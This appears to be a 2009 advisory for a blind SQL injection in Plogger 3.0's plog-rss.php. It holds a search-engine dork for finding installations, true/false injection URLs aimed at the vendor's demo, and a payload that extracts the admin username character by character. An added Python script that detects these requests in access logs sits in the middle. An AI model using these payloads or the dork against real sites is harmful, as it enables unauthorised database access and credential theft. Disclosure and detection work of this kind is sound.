Plogger 3.0

============================================

[0] Plogger 3.0 Remote Blind SQL Injection Vulnerability

Software : Plogger 3.0
Vendor : http://www.plogger.org/
Author : Angela Chang
Contact : angel@ch4ng.cc
Date : 11 August 2009
================================================


[o] Dork

"Powered by Plogger"


[+] Vulnerabilities

http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=1 <-- true
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=2 <-- false



[o] Demo Site

http://www.plogger.org/demo/plog-rss.php?level=collection&id=2%20and%20substring((SELECT%20admin_username%20FROM%20plogger_config%20LIMIT%200,1),1,5)=char(97,100,109,105,110)
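
A defender's check for the requests shown above, as an added example that is not part of the original advisory: it scans a web access log for hits on plog-rss.php whose id parameter is not a plain integer. The log lines, client addresses and function name are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format assumed);
# client addresses are documentation-range placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Aug/2009:10:00:01 +0000] "GET /demo/plog-rss.php?level=collection&id=2 HTTP/1.1" 200 5120
192.0.2.44 - - [11/Aug/2009:10:00:07 +0000] "GET /demo/plog-rss.php?level=collection&id=2%20and%201=1 HTTP/1.1" 200 5120
192.0.2.44 - - [11/Aug/2009:10:00:08 +0000] "GET /demo/plog-rss.php?level=collection&id=2+and+1=2 HTTP/1.1" 200 312
192.0.2.10 - - [11/Aug/2009:10:00:09 +0000] "GET /demo/plog-rss.php?level=collection&id=5 HTTP/1.1" 200 4096
192.0.2.44 - - [11/Aug/2009:10:00:12 +0000] "GET /demo/plog-rss.php?level=collection&id=2%20and%20substring((SELECT%20admin_username%20FROM%20plogger_config%20LIMIT%200,1),1,5)=char(97,100,109,105,110) HTTP/1.1" 200 5120
192.0.2.10 - - [11/Aug/2009:10:00:15 +0000] "GET /demo/index.php?level=collection&id=2 HTTP/1.1" 200 9000
"""

# client, timestamp and request target from one combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_rss_requests(log_text):
    """Return (client, timestamp, decoded id) for each plog-rss.php
    request whose id parameter is anything other than a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, timestamp, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/plog-rss.php"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space,
        # so both encodings of the same probe compare equal here.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, timestamp, value))
    return hits


if __name__ == "__main__":
    for client, timestamp, value in suspicious_rss_requests(SAMPLE_LOG):
        print(f"{timestamp} {client} non-integer id: {value!r}")
```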

================================================



[o] Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

===============================================
